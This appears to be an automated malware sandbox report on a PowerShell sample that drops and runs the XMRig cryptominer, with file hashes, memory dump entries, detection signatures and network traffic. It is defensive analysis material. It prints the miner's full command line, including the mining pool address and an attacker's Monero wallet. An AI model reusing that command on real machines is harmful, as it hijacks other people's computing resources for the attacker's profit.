C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kck1ijhi.amx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4160-9-0x0000027B9F4B0000-0x0000027B9F4D2000-memory.dmp
memory/4160-10-0x00007FFA68470000-0x00007FFA68F32000-memory.dmp
memory/4160-11-0x00007FFA68470000-0x00007FFA68F32000-memory.dmp
memory/4160-12-0x00007FFA68470000-0x00007FFA68F32000-memory.dmp
memory/4160-14-0x0000027B9F540000-0x0000027B9F552000-memory.dmp
memory/4160-15-0x0000027B9F520000-0x0000027B9F52A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3936-46-0x000001EF5E950000-0x000001EF5E970000-memory.dmp
memory/3936-47-0x000001EF5E990000-0x000001EF5E9B0000-memory.dmp
memory/3936-48-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/4160-50-0x00007FFA68470000-0x00007FFA68F32000-memory.dmp
memory/3936-52-0x000001EF60280000-0x000001EF602A0000-memory.dmp
memory/3936-51-0x000001EF60260000-0x000001EF60280000-memory.dmp
memory/3936-49-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/4160-53-0x00007FFA68473000-0x00007FFA68475000-memory.dmp
memory/3936-54-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-55-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-57-0x000001EF60280000-0x000001EF602A0000-memory.dmp
memory/3936-56-0x000001EF60260000-0x000001EF60280000-memory.dmp
memory/3936-58-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-59-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-60-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-61-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-62-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-63-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-64-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-65-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-66-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-67-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-68-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-69-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-70-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-71-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-72-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-73-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-74-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-75-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-76-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-77-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-78-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-79-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-80-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-81-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-82-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-83-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-84-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-85-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-86-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-87-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-88-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-89-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-90-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-91-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-92-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-93-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-94-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-95-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-96-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-97-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-98-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-99-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-100-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-101-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-102-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-103-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-104-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-105-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-106-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-107-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-108-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-109-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-110-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-111-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-112-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-113-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-114-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-115-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-116-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:29
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3344 wrote to memory of 1256 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3344 wrote to memory of 1256 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4200,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=3444 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3472,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=2160 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
Files
memory/3344-0-0x00007FFF91693000-0x00007FFF91695000-memory.dmp
memory/3344-1-0x000001B9A1600000-0x000001B9A1622000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zhmgym4m.zc3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3344-11-0x00007FFF91690000-0x00007FFF92151000-memory.dmp
memory/3344-12-0x00007FFF91690000-0x00007FFF92151000-memory.dmp
memory/3344-14-0x00007FFF91690000-0x00007FFF92151000-memory.dmp
memory/3344-16-0x000001B9A1660000-0x000001B9A166A000-memory.dmp
memory/3344-15-0x000001B9A3B40000-0x000001B9A3B52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1256-47-0x0000011990120000-0x0000011990140000-memory.dmp
memory/1256-48-0x0000011990180000-0x00000119901A0000-memory.dmp
memory/1256-49-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/3344-50-0x00007FFF91693000-0x00007FFF91695000-memory.dmp
memory/3344-51-0x00007FFF91690000-0x00007FFF92151000-memory.dmp
memory/1256-53-0x00000119901C0000-0x00000119901E0000-memory.dmp
memory/1256-52-0x00000119901A0000-0x00000119901C0000-memory.dmp
memory/1256-54-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/3344-55-0x00007FFF91690000-0x00007FFF92151000-memory.dmp
memory/1256-56-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-58-0x00000119901A0000-0x00000119901C0000-memory.dmp
memory/1256-57-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-59-0x00000119901C0000-0x00000119901E0000-memory.dmp
memory/1256-60-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-61-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-62-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-63-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-64-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-65-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-66-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-67-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-68-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-69-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-70-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-71-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-72-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-73-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-74-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-75-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-76-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-77-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-78-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-79-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-80-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-81-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-82-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-83-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-84-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-85-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-86-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-87-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-88-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-89-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-90-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-91-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-92-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-93-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-94-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-95-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-96-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-97-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-98-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-99-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-100-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-101-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-102-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-103-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-104-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-105-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-106-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-107-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-108-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-109-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-110-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-111-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-112-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-113-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-114-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-115-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-116-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-117-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-118-0x00007FF702630000-0x00007FF703263000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:32
Platform
win11-20240508-en
Max time kernel
1799s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3032 wrote to memory of 3876 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3032 wrote to memory of 3876 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/3032-0-0x00007FF886353000-0x00007FF886355000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qkqqyhb0.tx4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3032-9-0x000001A4A99E0000-0x000001A4A9A02000-memory.dmp
memory/3032-10-0x00007FF886350000-0x00007FF886E12000-memory.dmp
memory/3032-11-0x00007FF886350000-0x00007FF886E12000-memory.dmp
memory/3032-12-0x00007FF886350000-0x00007FF886E12000-memory.dmp
memory/3032-14-0x000001A4A9C90000-0x000001A4A9CA2000-memory.dmp
memory/3032-15-0x000001A4A9C70000-0x000001A4A9C7A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3876-46-0x0000023863410000-0x0000023863430000-memory.dmp
memory/3876-47-0x0000023863460000-0x0000023863480000-memory.dmp
memory/3876-48-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-51-0x0000023863480000-0x00000238634A0000-memory.dmp
memory/3876-50-0x00000238634A0000-0x00000238634C0000-memory.dmp
memory/3032-49-0x00007FF886350000-0x00007FF886E12000-memory.dmp
memory/3032-53-0x00007FF886353000-0x00007FF886355000-memory.dmp
memory/3876-52-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-54-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-55-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-56-0x00000238634A0000-0x00000238634C0000-memory.dmp
memory/3876-57-0x0000023863480000-0x00000238634A0000-memory.dmp
memory/3876-58-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-59-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-60-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-61-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-62-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-63-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-64-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-65-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-66-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
